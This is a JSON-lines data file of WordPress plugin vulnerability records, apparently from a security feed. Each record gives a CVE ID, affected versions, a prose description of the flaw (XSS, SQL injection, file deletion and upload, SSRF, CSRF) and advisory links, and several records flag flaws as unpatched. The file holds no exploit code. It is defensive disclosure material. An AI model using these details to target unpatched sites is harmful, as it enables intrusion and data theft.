{"CVE_ID":"CVE-2024-3641","slug":"newsletter-popup","versionImpact":"1.2","description":"The Newsletter Popup WordPress plugin through 1.2 does not sanitise and escape some parameters, which could allow unauthenticated visitors to perform Cross-Site Scripting attacks against admins","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4047f1e-d5ea-425f-8def-76dd5e6a497e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4047f1e-d5ea-425f-8def-76dd5e6a497e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3031","slug":"fluid-notification-bar","versionImpact":"3.2.3","description":"The Fluid Notification Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/451ca8a1-9354-462a-a110-c0c813cf0725?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/451ca8a1-9354-462a-a110-c0c813cf0725?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluid-notification-bar\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluid-notification-bar\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1168","slug":"wp-seopress","versionImpact":"7.9","description":"The SEOPress \u2013 On-site SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's social image URL in all versions up to, and including, 7.9 due to insufficient input sanitization and output escaping on user supplied image URLs. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c446f429-1981-4d6d-a5ec-a5837428d212?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c446f429-1981-4d6d-a5ec-a5837428d212?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-seopress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-seopress\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9118","slug":"qs-dark-mode","versionImpact":"2.9","description":"The QS Dark Mode Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61fce18a-44ec-442f-879e-f4ceab93d972?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61fce18a-44ec-442f-879e-f4ceab93d972?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/qs-dark-mode\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/qs-dark-mode\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159458\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159458\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2016-15040","slug":"kento-post-view-counter","versionImpact":"2.8","description":"The Kento Post View Counter plugin for WordPress is vulnerable to SQL Injection via the 'kento_pvc_geo' parameter in versions up to, and including, 2.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/525b466d-137a-467b-8b49-e51393a73866?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/525b466d-137a-467b-8b49-e51393a73866?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kento-post-view-counter\\\/trunk\\\/index.php#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kento-post-view-counter\\\/trunk\\\/index.php#L216\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8960","slug":"cowidgets-elementor-addons","versionImpact":"1.2.0","description":"The Cowidgets \u2013 Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fac90d55-9ae2-48a8-b82b-fe1626556c7b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fac90d55-9ae2-48a8-b82b-fe1626556c7b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/class-widgets-loader.php#L324\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/class-widgets-loader.php#L324\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cowidgets-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cowidgets-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10910","slug":"grid-plus","versionImpact":"1.3.5","description":"The The Grid Plus \u2013 Unlimited grid layout plugin for WordPress is vulnerable to arbitrary shortcode execution via grid_plus_load_by_category AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.5\\\/core\\\/ajax_fe.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.5\\\/core\\\/ajax_fe.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/grid-plus\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/grid-plus\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/266032a8-a139-4a14-8eda-8be7a66357df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/266032a8-a139-4a14-8eda-8be7a66357df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12717","slug":"aklamator-infeed","versionImpact":"2.0.0","description":"The Aklamator INfeed WordPress plugin through 2.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5564926a-6b1d-43f4-8147-128472f6b93a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5564926a-6b1d-43f4-8147-128472f6b93a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13720","slug":"wp-image-uploader","versionImpact":"1.0.1","description":"The WP Image Uploader plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the gky_image_uploader_main_function() function in all versions up to, and including, 1.0.1. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-uploader\\\/trunk\\\/index.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-uploader\\\/trunk\\\/index.php#L85\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af41f69-1335-4199-bf29-c9699de50a16?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af41f69-1335-4199-bf29-c9699de50a16?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-13820","slug":"melhor-envio-cotacao","versionImpact":"2.15.9","description":"The Melhor Envio plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.15.9 via the 'run' function, which uses a hardcoded hash. This makes it possible for unauthenticated attackers to extract sensitive data including environment information, plugin tokens, shipping configurations, and limited vendor information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/melhorenvio\\\/wp-melhorenvio-v2\\\/blob\\\/6e2f5bb01c536df9fc84534eb8a27ec99d9601af\\\/Services\\\/TestService.php\",\"name\":\"https:\\\/\\\/github.com\\\/melhorenvio\\\/wp-melhorenvio-v2\\\/blob\\\/6e2f5bb01c536df9fc84534eb8a27ec99d9601af\\\/Services\\\/TestService.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melhor-envio-cotacao\\\/trunk\\\/Services\\\/TestService.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melhor-envio-cotacao\\\/trunk\\\/Services\\\/TestService.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melhor-envio-cotacao\\\/trunk\\\/Services\\\/TestService.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melhor-envio-cotacao\\\/trunk\\\/Services\\\/TestService.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8f093bc-5cd3-41a0-b86b-d00338334d2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8f093bc-5cd3-41a0-b86b-d00338334d2e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5818","slug":"featured-image-plus","versionImpact":"1.6.4","description":"The Featured Image Plus \u2013 Quick & Bulk Edit with Unsplash plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.6.4 via the fip_get_image_options() function. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-plus\\\/trunk\\\/inc\\\/admin\\\/block-editor\\\/block-editor-actions.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-plus\\\/trunk\\\/inc\\\/admin\\\/block-editor\\\/block-editor-actions.php#L166\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6904f168-e06f-4f17-905b-a943a39dfbdb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6904f168-e06f-4f17-905b-a943a39dfbdb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2555","slug":"currency-switcher","versionImpact":"1.1.9","description":"The WPCS \u2013 WordPress Currency Switcher Professional plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the create function in versions up to, and including, 1.1.9. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to create a custom drop-down currency switcher.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd6b5d6d-5f5b-4b38-a25a-02cc1c041d37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd6b5d6d-5f5b-4b38-a25a-02cc1c041d37?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4426","slug":"absolute-reviews","versionImpact":"1.0.8","description":"The Absolute Reviews plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.8. This is due to missing or incorrect nonce validation on the metabox_review_save() function. This makes it possible for unauthenticated attackers to save meta tags via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548729%40absolute-reviews&new=2548729%40absolute-reviews&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548729%40absolute-reviews&new=2548729%40absolute-reviews&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec1ee47d-020c-482d-ad6f-663d78e624b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec1ee47d-020c-482d-ad6f-663d78e624b8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5062","slug":"wp-charts","versionImpact":"0.7.0","description":"The WordPress Charts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'wp_charts' shortcode in versions up to, and including, 0.7.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-charts\\\/tags\\\/0.7.0\\\/wordpress_charts_js.php#L223\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-charts\\\/tags\\\/0.7.0\\\/wordpress_charts_js.php#L223\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2de2d2c5-1373-45b6-93a0-575713226669?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2de2d2c5-1373-45b6-93a0-575713226669?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-charts\\\/tags\\\/0.7.0\\\/wordpress_charts_js.php#L229\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-charts\\\/tags\\\/0.7.0\\\/wordpress_charts_js.php#L229\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1687","slug":"woo-thank-you-page-customizer","versionImpact":"1.1.2","description":"The Thank You Page Customizer for WooCommerce \u2013 Increase Your Sales plugin for WordPress is vulnerable to unauthorized execution of shortcodes due to a missing capability check on the get_text_editor_content() function in all versions up to, and including, 1.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/310afe02-3a51-4633-b359-65ae58d0c032?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/310afe02-3a51-4633-b359-65ae58d0c032?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3041096%40woo-thank-you-page-customizer&new=3041096%40woo-thank-you-page-customizer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3041096%40woo-thank-you-page-customizer&new=3041096%40woo-thank-you-page-customizer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3341","slug":"auxin-elements","versionImpact":"2.15.5","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'aux_gmaps' shortcode in all versions up to, and including, 2.15.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3705f028-9c8d-48b1-8950-160e10038294?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3705f028-9c8d-48b1-8950-160e10038294?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elements\\\/gmap.php#L301\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elements\\\/gmap.php#L301\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elements\\\/gmap.php#L266\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elements\\\/gmap.php#L266\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6353","slug":"woo-wallet","versionImpact":"1.5.4","description":"The Wallet for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'search[value]' parameter in all versions up to, and including, 1.5.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7d5a077-8836-4c28-8884-5047585a99e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7d5a077-8836-4c28-8884-5047585a99e5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-wallet\\\/trunk\\\/includes\\\/class-woo-wallet-ajax.php#L393\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-wallet\\\/trunk\\\/includes\\\/class-woo-wallet-ajax.php#L393\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-wallet\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-wallet\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116025\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116025\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9060","slug":"avif-support","description":"The AVIF & SVG Uploader plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in version 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a09113d3-8be0-45fa-b1d7-4eb6ebb1780e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a09113d3-8be0-45fa-b1d7-4eb6ebb1780e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/avif-support\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/avif-support\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159481\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159481\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10779","slug":"cowidgets-elementor-addons","versionImpact":"1.2.0","description":"The Cowidgets \u2013 Elementor Addons plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.0 via the 'ce_template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec005f9f-3f63-4d73-9bd5-dc9c4c4b8bfe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec005f9f-3f63-4d73-9bd5-dc9c4c4b8bfe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cowidgets-elementor-addons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cowidgets-elementor-addons\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10590","slug":"halfdata-optin-downloads","versionImpact":"4.07","description":"The Opt-In Downloads plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the admin_upload() function in all versions up to, and including, 4.07. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. Due to the presence of an .htaccess file, this can only be exploited to achieve RCE on NGINX servers, unless another vulnerability is present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/subscribe-download\\\/2687305\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/subscribe-download\\\/2687305\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c3c20b8-12cf-4ce6-a1d4-99204df33fcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c3c20b8-12cf-4ce6-a1d4-99204df33fcd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12715","slug":"asgard","versionImpact":"0.7","description":"The Asgard Security Scanner WordPress plugin through 0.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e1456295-75ba-4dc2-9b1a-dc16a2000db2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e1456295-75ba-4dc2-9b1a-dc16a2000db2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13715","slug":"zstore-manager-basic","versionImpact":"3.311","description":"The zStore Manager Basic plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the zstore_clear_cache() function in all versions up to, and including, 3.311. This makes it possible for authenticated attackers, with Subscriber-level access and above, to clear the plugin's cache.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zstore-manager-basic\\\/trunk\\\/zstore-manager.php#L441\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zstore-manager-basic\\\/trunk\\\/zstore-manager.php#L441\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/974ffc87-369a-431e-b601-8c6679d963c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/974ffc87-369a-431e-b601-8c6679d963c3?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
